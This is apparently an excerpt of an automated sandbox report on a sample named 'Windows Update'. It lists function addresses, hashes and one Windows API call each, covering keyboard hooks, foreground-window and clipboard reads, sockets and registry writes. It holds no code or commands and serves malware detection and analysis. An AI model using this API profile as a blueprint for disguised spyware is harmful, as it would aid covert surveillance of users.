                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 1163d6cfad22b746e7a9db687b5147daa239a0e6621e68c2846312b94e837f34
                                                                                  • Instruction ID: 1ca9593dac2ccf5b748ff21e16760122af6e55f57b0a0ecc5260a09a40f8f3e6
                                                                                  • Opcode Fuzzy Hash: 1163d6cfad22b746e7a9db687b5147daa239a0e6621e68c2846312b94e837f34
                                                                                  • Instruction Fuzzy Hash: 93218E71500740EFF720DF65DC85BAAFBE8EF04310F14846AEE488B282D775A904CA65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641833, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(?,00000E40,?,?), ref: 006418B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0e0332efdbd51a6881c5175911ea2017fe4799c830d7db3c05d4727bbb2dbb84
                                                                                  • Instruction ID: c94500d0e1f1ce0325847f12c585e6a2f226aca707c909803e0d83fe023b5edd
                                                                                  • Opcode Fuzzy Hash: 0e0332efdbd51a6881c5175911ea2017fe4799c830d7db3c05d4727bbb2dbb84
                                                                                  • Instruction Fuzzy Hash: 6E212471509340AFD311CF25DC41FA6BFB8EF86720F1581ABEC489B642D235B915CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645C95, Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 00645D0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePeek
                                                                                  • String ID:
                                                                                  • API String ID: 2222842502-0
                                                                                  • Opcode ID: 1dfe165323b2e6b4507f72d9ce677b7beb1c27c0c253d2be2dfc076de3a61dc8
                                                                                  • Instruction ID: 10e1c033dddc44d6c98a081e8b81a37b2eb3fc6f6fdadc7369255a332008e56d
                                                                                  • Opcode Fuzzy Hash: 1dfe165323b2e6b4507f72d9ce677b7beb1c27c0c253d2be2dfc076de3a61dc8
                                                                                  • Instruction Fuzzy Hash: 5921C3765097809FEB228F25DC44A92FFB4EF07314F0884CEED858F663D265A809DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B84E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0011B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: fb2c253663b2a96fd3182d93e39eec025f16a4d0e35d60eb47426931452aaf29
                                                                                  • Instruction ID: 97aea7ec7ff77469d914a11908efb4fdaadaf93e64220961b92a0935bc3b77a4
                                                                                  • Opcode Fuzzy Hash: fb2c253663b2a96fd3182d93e39eec025f16a4d0e35d60eb47426931452aaf29
                                                                                  • Instruction Fuzzy Hash: 2D21A171504704EFEB21DF55DC85B9AFBE8EF08710F14846EEA858A252D375A844CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641460, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006414D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: c210520770c24a088116d24c98ff3f88546ab29d549ad0302ed9a85b454d8dfa
                                                                                  • Instruction ID: 7ddcc8e116c823cea1df63a3bf4f9a21ca856b110a5567bd4f75dc819178542d
                                                                                  • Opcode Fuzzy Hash: c210520770c24a088116d24c98ff3f88546ab29d549ad0302ed9a85b454d8dfa
                                                                                  • Instruction Fuzzy Hash: 12219D725093C09FE712CB25DC95A92BFB4EF03224F0984EBD8858F263C265A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643E5A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00643ED6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connect
                                                                                  • String ID:
                                                                                  • API String ID: 3144859779-0
                                                                                  • Opcode ID: 6ec056169879eb623fdb5eb502c88a57e9be6465323fba9d865084dab15cb119
                                                                                  • Instruction ID: b7596eaf4057d09fd62d7d1a63d5138926d2904e392b2f5ed1e847e83dd78c9a
                                                                                  • Opcode Fuzzy Hash: 6ec056169879eb623fdb5eb502c88a57e9be6465323fba9d865084dab15cb119
                                                                                  • Instruction Fuzzy Hash: FA218E71509380AFDB228F55DC44B92FFF4EF06310F08849AE9858B263D336A818DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640526, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 9932f923c4da98040d931874755030266e6949d8f227da7a8a585fd6d80b80e9
                                                                                  • Instruction ID: 3815491fc00478ebcc6ba978471fbffb5fa4dfdbe68ff7652db9b5568dbba586
                                                                                  • Opcode Fuzzy Hash: 9932f923c4da98040d931874755030266e6949d8f227da7a8a585fd6d80b80e9
                                                                                  • Instruction Fuzzy Hash: D621AE71500304EFF721DF55CD85F9AFBE8EF08310F04845AEA899B641D771A905CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006453CA, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • K32GetModuleInformation.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064542E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationModule
                                                                                  • String ID:
                                                                                  • API String ID: 3425974696-0
                                                                                  • Opcode ID: 06f2584063a9c90b55a3fa8316a7bfc7f45fc5d5c2855ee4ebf1a3b82e064886
                                                                                  • Instruction ID: 718b7de63f8bfc92ae323a8f51b2704ccde4884b35770485458c7448f6858d02
                                                                                  • Opcode Fuzzy Hash: 06f2584063a9c90b55a3fa8316a7bfc7f45fc5d5c2855ee4ebf1a3b82e064886
                                                                                  • Instruction Fuzzy Hash: C611BE71500700EFEB20CF15DC85FAAFBE8EF04721F14846AED09CB292D674E9448AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AD47, Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnumThreadWindows.USER32(?,00000E40,?,?), ref: 0011ADC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumThreadWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2941952884-0
                                                                                  • Opcode ID: 666b041ba8c3390a25034c56e4bd0c402080a40c19ac0e72e720b800e390f2c4
                                                                                  • Instruction ID: a747cec6fe08254bb2edf79fc06848058eff4aadb82383fed6cced5e4be45a24
                                                                                  • Opcode Fuzzy Hash: 666b041ba8c3390a25034c56e4bd0c402080a40c19ac0e72e720b800e390f2c4
                                                                                  • Instruction Fuzzy Hash: 5521E472509380AFD311CB25DC41F66BFB4EF87610F0981DFE8888B253D225B918CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064365A, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenCurrentUser.KERNEL32(?,00000E40), ref: 006436BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenUser
                                                                                  • String ID:
                                                                                  • API String ID: 1571386571-0
                                                                                  • Opcode ID: e6ae40c410f7d4b57cdba9995e3ddd36a6e409e89a6a20c9df06b1bd84df6149
                                                                                  • Instruction ID: 56d7624737b6430f2cd296f7582c9841a09d23e0b392fd661e22deb927501f37
                                                                                  • Opcode Fuzzy Hash: e6ae40c410f7d4b57cdba9995e3ddd36a6e409e89a6a20c9df06b1bd84df6149
                                                                                  • Instruction Fuzzy Hash: F911C4B1500304EFFB20DF54DC85FAAFBA8EF04760F14846AFD449B342D675A9058AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064385E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006438C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotifyValue
                                                                                  • String ID:
                                                                                  • API String ID: 3933585183-0
                                                                                  • Opcode ID: eb525f2a24c660de8aa2773c210409bcdcf612a77694ac291a4597f91a1b6454
                                                                                  • Instruction ID: 36721dbcbd3b42aaf8f986edc23f3bbdf648e95cc82ae162f72116e0daacf34f
                                                                                  • Opcode Fuzzy Hash: eb525f2a24c660de8aa2773c210409bcdcf612a77694ac291a4597f91a1b6454
                                                                                  • Instruction Fuzzy Hash: EB11D072400304EFEB21CF51CC85FAAFBECEF04720F14896AF9499B241D671AA048BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006452E2, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00645354
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: b6d8502abf13751f191766b14361822659d90ad00d10904fc7fd6b49507f2eaf
                                                                                  • Instruction ID: 9160a85aad12c14f6044361d7ea9de2f1f24fe9ee59283331b1107c30268ea3c
                                                                                  • Opcode Fuzzy Hash: b6d8502abf13751f191766b14361822659d90ad00d10904fc7fd6b49507f2eaf
                                                                                  • Instruction Fuzzy Hash: 40119072500B00EFEB218E11CC85FA7FBE8EF04750F14855AED469B642E6B1E905CAB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641989, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 00641A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: 5fdf2c5c09808cd0d38d33c56bb734b1d0c9065d9c52082ec03734d6a2f2f44b
                                                                                  • Instruction ID: ec311c5c88647597e4aae92637dfad691d712ad21c7d1102cab61b71b01b11f9
                                                                                  • Opcode Fuzzy Hash: 5fdf2c5c09808cd0d38d33c56bb734b1d0c9065d9c52082ec03734d6a2f2f44b
                                                                                  • Instruction Fuzzy Hash: C3219071509380AFE722CB15DC45BA2BFA8EF16314F08809AED848B253D265A949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064018A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006401FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 1ee66d5947391a50499f77d1c50208665d03cc785212632d25f26bd89a9cecb1
                                                                                  • Instruction ID: 787a1d4642e036ae2aaa602f84516b9d6434eed537f1d802431ab0c77b3e8749
                                                                                  • Opcode Fuzzy Hash: 1ee66d5947391a50499f77d1c50208665d03cc785212632d25f26bd89a9cecb1
                                                                                  • Instruction Fuzzy Hash: 05117C72500700AFFB21CE55DC85FA7BBE8EF04720F04855AEA459B691D670E949CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640B72, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: bd91ceafce1db220ac35915cbce7bff40a8abcb0b1375bcec486e9e90313d483
                                                                                  • Instruction ID: 5b8628522e4509ced70742c2aa217db4dee698512092b9dd67009975077140a6
                                                                                  • Opcode Fuzzy Hash: bd91ceafce1db220ac35915cbce7bff40a8abcb0b1375bcec486e9e90313d483
                                                                                  • Instruction Fuzzy Hash: 9211EF72100704EFFB21CF61DC85FAAFBA8EF04320F04856AEA098B241D671A9448BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064508A, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • K32EnumProcessModules.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006450E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumModulesProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1082081703-0
                                                                                  • Opcode ID: c1149b8584ff6ce555e6965d1d50e79d9939b8c196d27b34146011919310e8fd
                                                                                  • Instruction ID: 8e3ce8151f97ee352beb7b34cd6426f9a067b009b2d07e1f3107f2eb4bd34575
                                                                                  • Opcode Fuzzy Hash: c1149b8584ff6ce555e6965d1d50e79d9939b8c196d27b34146011919310e8fd
                                                                                  • Instruction Fuzzy Hash: 8F11C172500700EFFB21DF55DC85FAAFBA8EF04720F14846AFD4A9B641D671A9048BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641162, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006411C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  • Opcode ID: 617146458d2b5eccb6f6b3098fb53e13dc35f2a410a4bde4d68013564b897fb9
                                                                                  • Instruction ID: 1a15b3dbe0e1a7670603d53530ab282bf1ae48093baef81b0ec4b83a83f3f0ce
                                                                                  • Opcode Fuzzy Hash: 617146458d2b5eccb6f6b3098fb53e13dc35f2a410a4bde4d68013564b897fb9
                                                                                  • Instruction Fuzzy Hash: 9811B272400304EFEB21DF51CC85F97FBDCEF05320F14856AEA09DB241D674AA448AB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006465C6, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00646622
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CertCertificateChainPolicyVerify
                                                                                  • String ID:
                                                                                  • API String ID: 3930008701-0
                                                                                  • Opcode ID: 2a78a1fa7a73db3e52dd73c16fbbab45b3d4985c5ab68fc3f9bc6ae4bd38b58b
                                                                                  • Instruction ID: f2bae14a01f79fd4fcddd1fbe2fa1171bd1c3ccef80d918e56994c048be2ce35
                                                                                  • Opcode Fuzzy Hash: 2a78a1fa7a73db3e52dd73c16fbbab45b3d4985c5ab68fc3f9bc6ae4bd38b58b
                                                                                  • Instruction Fuzzy Hash: 2511E3B1500300EFFB20CF15DC85FAAFBA8EF05720F14846AFD098A641D675A944CB72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A65A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A6CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: e65787e813ba20e9f2cec096731d1825c2e732a0f127834e923117d995b0018f
                                                                                  • Instruction ID: bf43a9e5581f6df34c8f9c96b525ef24cab3fa953e59a2e054298fead618c1dd
                                                                                  • Opcode Fuzzy Hash: e65787e813ba20e9f2cec096731d1825c2e732a0f127834e923117d995b0018f
                                                                                  • Instruction Fuzzy Hash: 63214A7140A3C49FE7138B259C54A92BFB4DF07624F0980DBDD848B1A3D2655948D772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006400C6, Relevance: 1.6, APIs: 1, Instructions: 62comclipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleGetClipboard.OLE32(?,00000E40,?,?), ref: 00640142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 6667a892f84c3a584e5024958ecb5721dd4c62b987c4a132fe43a5d912e4b342
                                                                                  • Instruction ID: 77fdae8488b8bd87cc93d1b4b854237a991d35aecb86f0bc421a42513492c7e8
                                                                                  • Opcode Fuzzy Hash: 6667a892f84c3a584e5024958ecb5721dd4c62b987c4a132fe43a5d912e4b342
                                                                                  • Instruction Fuzzy Hash: E4119471905340AFE3118B16DC41F36BFB8EF86620F19819AED489B692D225B915CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640E9E, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction ID: 35ba8d1dad2d0b5e748f373bd800130a8fb872b922b48f61e713cff5fbeec353
                                                                                  • Opcode Fuzzy Hash: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction Fuzzy Hash: B7118271500304EFF720CF55DC85F96FB98EF04760F148466EE099B641D674A945CA75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0011A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 70dbbd8fedec3ddbb165f64385c0c354b2b2ecbee870f248cca01d29ecc8c56d
                                                                                  • Instruction ID: c01261e0c757da5ca3657a5f97c5b903c05de7afe42f81e8c0ec5272c5386d04
                                                                                  • Opcode Fuzzy Hash: 70dbbd8fedec3ddbb165f64385c0c354b2b2ecbee870f248cca01d29ecc8c56d
                                                                                  • Instruction Fuzzy Hash: 80118471409380AFDB228F51DC44B62FFF4EF46310F0884DAED858B562C376A418DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644AFE, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00644B68
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 19a93e46416e1840692b4f70731849c23e3c90075e3f19e91eb1bb0986b1e4a9
                                                                                  • Instruction ID: 02221ac47d3740a591d83997bb306399938da3b4a5be5c8bf0fc68727f2bc021
                                                                                  • Opcode Fuzzy Hash: 19a93e46416e1840692b4f70731849c23e3c90075e3f19e91eb1bb0986b1e4a9
                                                                                  • Instruction Fuzzy Hash: 7E11C172500700EFFB219F11CC45FA7FBA8EF04710F04855AEE459A651CA71E904CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BED2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 0dc1e8f6cadc3c0b67a82e709d7038ecad3982defd31b3c788e6f2f837ef30b8
                                                                                  • Instruction ID: 6404d54b94d336cdac5c1488b20587ffb25514642fc636899a33353b9e4f1cb2
                                                                                  • Opcode Fuzzy Hash: 0dc1e8f6cadc3c0b67a82e709d7038ecad3982defd31b3c788e6f2f837ef30b8
                                                                                  • Instruction Fuzzy Hash: 1B11E372404700EFEB21CF51DC85FA6FBA8EF04720F1485AAFD099A151C775A945CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A373, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 0011A3D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ForegroundWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2020703349-0
                                                                                  • Opcode ID: eb0f7ee92b0a449b6e4c3777c292eb1f1923bbc21d8d024fb04b241f844728ec
                                                                                  • Instruction ID: c67722a8a6d4037a1620063edf0ef7dd3981f8556f76531bc8130ec5cfa05d72
                                                                                  • Opcode Fuzzy Hash: eb0f7ee92b0a449b6e4c3777c292eb1f1923bbc21d8d024fb04b241f844728ec
                                                                                  • Instruction Fuzzy Hash: 821182754093C09FE7128B21DC44BA2BFA4EF53224F0980EBED848F263D2795949D7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645BE8, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
